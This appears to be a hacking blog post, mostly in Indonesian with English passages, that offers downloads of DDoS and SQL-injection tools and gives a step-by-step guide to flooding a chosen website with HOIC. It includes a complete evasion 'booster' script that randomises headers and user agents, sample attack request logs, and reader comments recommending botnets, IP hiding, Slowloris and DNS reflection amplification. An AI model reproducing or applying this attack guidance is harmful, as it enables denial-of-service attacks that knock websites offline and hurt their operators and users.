Yang Mau download tinggal download aja, didalamnya kurang lebih ada LOIC, HOIC, Byte DDOS, Havij, UPD UNICORN, IP reserve Tool. Untuk cara bisa di Komentar saja menyanya, atau bisa dilihat di eyang Google. Download aja nih gan, disini DOWNLOAD DISINI. HOIC DDOS TOOLS DOWNLOAD + (Cara DDOS Menggunakan HOIC) Label: Hacking Website Sebagian Anak2 Group Facebook Ini Mungkin Sudah Tau Cara Menggunakan HOIC tools ini gak sudah lama di share ama bang Spider. tapi bru skrng bisa ngeshare di blog ini hehehe belom dapet izin soalnya. Hight Orbit Ion Cannon, known as 'HOIC' is a very powerful tool used to flood websites by launching a DDOS attack, Just like LOIC. But HOIC more powerful than LOIC because of the Booster Scripts. So, how to flood a website with HOIC? Its really very easy. 1) Download Hoic and Open it up. Download HOIC: Click Here.
URL - is the target website to attack
Power -> sets the request velocity. Initial testing shows the following:
Low = ~2 requests/sec for eacch THREAD defined on the main GUI
Mediem = ~4 requests/sec for each THREAD defined on the main GUI
High - ~8 requests/sec for each THREAD defined on the main GUI
Booster - are config scripts that define the dynamic request attributes
GET / HTTP/1.0
Accept: */*
Accept-Language: en
Host: www.hoic_target_site.com
72.192.214.223 - - [27/Jan/2012:08:57:59 -0600] 'GET / HTTP/1.0' 200 21124 '-' '-'
72.192.214.223 - - [27/Jan/2012:08:57:59 -0600] 'GET / HTTP/1.0' 200 21124 '-' '-'
72.192.214.223 - - [27/Jan/2012:08:58:00 -0600] 'GET / HTTP/1.0' 200 21124 '-' '-'
72.192.214.223 - - [27/Jan/2012:08:58:00 -0600] 'GET / HTTP/1.0' 200 21124 '-' '-'
72.192.214.223 - - [27/Jan/2012:08:58:00 -0600] 'GET / HTTP/1.0' 200 21124 '-' '-'
72.192.214.223 - - [27/Jan/2012:08:58:00 -0600] 'GET / HTTP/1.0' 200 21124 '-' '-'
72.192.214.223 - - [27/Jan/2012:08:58:00 -0600] 'GET / HTTP/1.0' 200 21124 '-' '-'
72.192.214.223 - - [27/Jan/2012:08:58:00 -0600] 'GET / HTTP/1.0' 200 21124 '-' '-'
72.192.214.223 - - [27/Jan/2012:08:58:01 -0600] 'GET / HTTP/1.0' 200 21124 '-' '-'
72.192.214.223 - - [27/Jan/2012:08:58:01 -0600] 'GET / HTTP/1.0' 200 21124 '-' '-'
72.192.214.223 - - [27/Jan/2012:08:58:01 -0600] 'GET / HTTP/1.0' 200 21124 '-' '-'
72.192.214.223 - - [27/Jan/2012:08:58:01 -0600] 'GET / HTTP/1.0' 200 21124 '-' '-'
72.192.214.223 - - [27/Jan/2012:08:58:02 -0600] 'GET / HTTP/1.0' 200 21124 '-' '-'
72.192.214.223 - - [27/Jan/2012:08:58:02 -0600] 'GET / HTTP/1.0' 200 21124 '-' '-'
72.192.214.223 - - [27/Jan/2012:08:58:02 -0600] 'GET / HTTP/1.0' 200 21124 '-' '-'
72.192.214.223 - - [27/Jan/2012:08:58:02 -0600] 'GET / HTTP/1.0' 200 21124 '-' '-'
72.192.214.223 - - [27/Jan/2012:08:58:02 -0600] 'GET / HTTP/1.0' 200 21124 '-' '-'
72.192.214.223 - - [27/Jan/2012:08:58:02 -0600] 'GET / HTTP/1.0' 200 21124 '-' '-'
72.192.214.223 - - [27/Jan/2012:08:58:03 -0600] 'GET / HTTP/1.0' 200 21124 '-' '-'
72.192.214.223 - - [27/Jan/2012:08:58:03 -0600] 'GET / HTTP/1.0' 200 21124
OK!
So BASICALLY
HOIC is pretty useless
UNLESS it is used incombination with 'BOOSTERS', AKA 'SCRIPTS'/BOOST PACKS / BOOM BOOM POWER
These boosters come in the form of .HOIC scripts.
hoic scripts are very simple and follow VB6 mixed with vb.net syntax although slightly altered
here are the functions and globals that relate the HOIC:
booster -> This is a global variable that contains the contents of the current script (string)
Headers -> This is a global variable that is an array of strings, and will be used to form headers in requests sent to the target URL. To add a header, simply do something like this:
Headers.Append('User-Agent: penis') or Headers.Append('User-Agent: penis x' + CStr(powerFactor)
lbIndex -> Index into list box (cant really be used outside of the program, useless to developers)
PostBuffer -> String buffer containig post paramets, ie PostBuffer = 'lol=2&lolxd=5'
powerFactor -> Integer from 0-2, 0 being low, 1 being medium , 2 being high
totalbytessent -> a count of the number of bytes sent to the target already (presistent across each attack)
URL -> url to attack
UsePost -> boolean, true = uses post, otherwise itll use get
Dim useragents() as String
Dim referers() as String
dim randheaders() as string
// EDIT THE FOLLOWING STRINGS TO MAKE YOUR OWN BOOST UNIQUE AND THEREFORE MORE EVASIVE!
// populate list
useragents.Append 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6'
useragents.Append 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'
useragents.Append 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)'
useragents.Append 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)'
useragents.Append 'Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.1; .NET CLR 1.1.4322)'
useragents.Append 'Googlebot/2.1 ( http://www.googlebot.com/bot.html) '
useragents.Append 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14'
useragents.Append 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.600.0 Safari/534.14'
useragents.Append 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13'
useragents.Append 'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Ubuntu/10.04 Chromium/9.0.595.0 Chrome/9.0.595.0 Safari/534.13'
useragents.Append 'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50727)'
useragents.Append 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; Media Center PC 4.0; SLCC1; .NET CLR 3.0.04320)'
useragents.Append 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; zh-cn) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5'
useragents.Append 'Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0 Safari/533.16'
useragents.Append 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51'
useragents.Append 'Mozilla/5.0 (Windows NT 5.1; U; Firefox/5.0; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53'
// populate referer list
referers.Append 'http://www.google.com/?q='+URL
referers.Append URL
referers.Append 'http://www.google.com/'
referers.Append 'http://www.yahoo.com/'
// Add random headers
randheaders.Append 'Cache-Control: no-cache'
randheaders.Append 'If-Modified-Since: Sat, 29 Oct 1994 11:59:59 GMT'
randheaders.Append 'If-Modified-Since: Tue, 18 Aug 2007 12:54:49 GMT'
randheaders.Append 'If-Modified-Since: Wed, 30 Jan 2000 01:21:09 GMT'
randheaders.Append 'If-Modified-Since: Tue, 18 Aug 2009 08:49:15 GMT'
randheaders.Append 'If-Modified-Since: Fri, 20 Oct 2006 09:34:27 GMT'
randheaders.Append 'If-Modified-Since: Mon, 29 Oct 2007 11:59:59 GMT'
randheaders.Append 'If-Modified-Since: Tue, 18 Aug 2003 12:54:49 GMT'
// ------------------ DO NOT EDIT BELOW THIS LINE
// generate random referer
Headers.Append 'Referer: ' + referers(RndNumber(0, referers.UBound))
// generate random user agent (DO NOT MODIFY THIS LINE)
Headers.Append 'User-Agent: ' + useragents(RndNumber(0, useragents.UBound))
// Generate random headers
Headers.Append randheaders(RndNumber(0, randheaders.UBound))
GET / HTTP/1.0
Accept: */*
Accept-Language: en
Referer: http://www.hoic_target_site.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.1; .NET CLR 1.1.4322)
If-Modified-Since: Sat, 29 Oct 1994 11:59:59 GMT
Host: www.hoic_target_site.com
GET / HTTP/1.0
Accept: */*
Accept-Language: en
Referer: http://www.yahoo.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13
If-Modified-Since: Tue, 18 Aug 2003 12:54:49 GMT
Host: www.hoic_target_site.com
What is HOIC?
Hight Orbit Ion Cannon, known as “HOIC” is a very powerful tool used to flood websites by launching a DDOS attack, Just like LOIC. but HOIC more powerful than LOIC because of the Booster Scripts.
So, how to flood a website with HOIC? its really very easy.
2) Click on the “+” sign under “TARGETS”, a pop up box should appear, now type in the website you want to flood in the box. Select Power to High, Select “GenericBoost.hoic” under the Turbo Booster section and click Add.
3) Select Threads 2 or 3, remember threads is number of users HOIC should simulate in order to attack since it is Distributed DOS attack, the more you select the more time it takes.
4) Now finally click on the Big Red Button “FIRE TEH LAZER” and wait. you can see the status of the attack from the program.
https://www.virustotal.com/en/file/0bfe3../analysis/
Thanks for the share altough i wont need it :P, please support the real developers or at least give credits to them.
Uhmm…Does the ddos affect users globaly?Cuz when I used loic to ddos a website users in my local network couldnt access it but others around the world could.
Still won’t take anything with a decent bandwidth down by yourself
In my experience, HOIC is mostly useless. This fails on many pentests which I perform. Slowloris attack is much better…
The link on “virustotal” is false.
You can see the error on :
http://image.noelshack.com/fichiers/2015/15/1428754333-capture.png
Can you post the true link ?
The problem with Dos attacks is that it not only affects the endpoint, but also an entire data center.
Steal my girl mp3 download. If you want to get websites down, there are many more effective ways.
Hello thanks do u need to be connected to internet before you can do it
@G_joboy:
There is no internet connection required.
Although, there has been an update on the software for HOIC. Right now, you have to enter this in the TARGET section before it works:127.0.0.1
Then click FIRE TEH LAZER and you should be good :)
[quote=G_joboy] Hello thanks do you need to be connected to internet before you can do it [/quote]
No what makes you think you need to connect to the internet to take a website down?!
Broken download links…
“Dangerous File Blocked”
and “404 - The requested page could not be found”…
Lol
Use torshammer instead
Installation guide - here
For more information including download link: here
you guys do know that LOIC/HOIC/etc. are horrible tools for performing a “DOS” attack.
1. you can be easily traced because you are performing an attack from your home IP address.
2. you can literally rent a server and make a botnet if anything, it would be more efficient.
3. don’t waist your time on free distributed tools this only reason i clicked on this was so i could enlighten some fresh script kiddies on how horribly idiotic you guys have become.
love ~@Damag3d___
Don’t be so harsh with them @damag3d , we don’t own the some knowledge
I, some years ago when I started doing hacking things, thought too that LOIC or HOIC were some great hacking tool
Then after some time, I learnt things and understood by myself how bad they were :)
And yes, has he said, if you wanna perform such a thing, you have some better and efficient ways.
You could make a little script + adding something that won’t show your IP address in their logs
I’m not gonna tell everything, ‘cause ToC and CoC :p
Google is your friend!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’‘ at line 1
What makes ddos so cool or scary in first understanding the attack bu useing usch binaries of HOIC is the fact that one can designate a target and click a button and then witness the TTL dwindle to a stop….though that’s just not going to happen with an average home PC using fiber and one instance of HOIC….
For example… To impact a somewhat important companies infrastructure the attack will need at least 65GB or higher… just to make an impact if at all any impact at all, depends on a few things such as mitigations (e.g CloudFlare) It is highly unlikely that the attacker has a single machine with a big enough Internet connection to generate that much traffic on its own. To launch a 65Gbps attack for example you’d need a botnet with at least 65,000 compromised machines each capable of sending 1Mbps of upstream data.
Since renting a large botnet can be expensive and unwieldy, attackers typically look for additional ways to amplify the size of their attacks,
one such amplification technique called DNS reflection.
In saying all that, if you were to pen test am individual at a home PC the bandwidth needed will not be as much.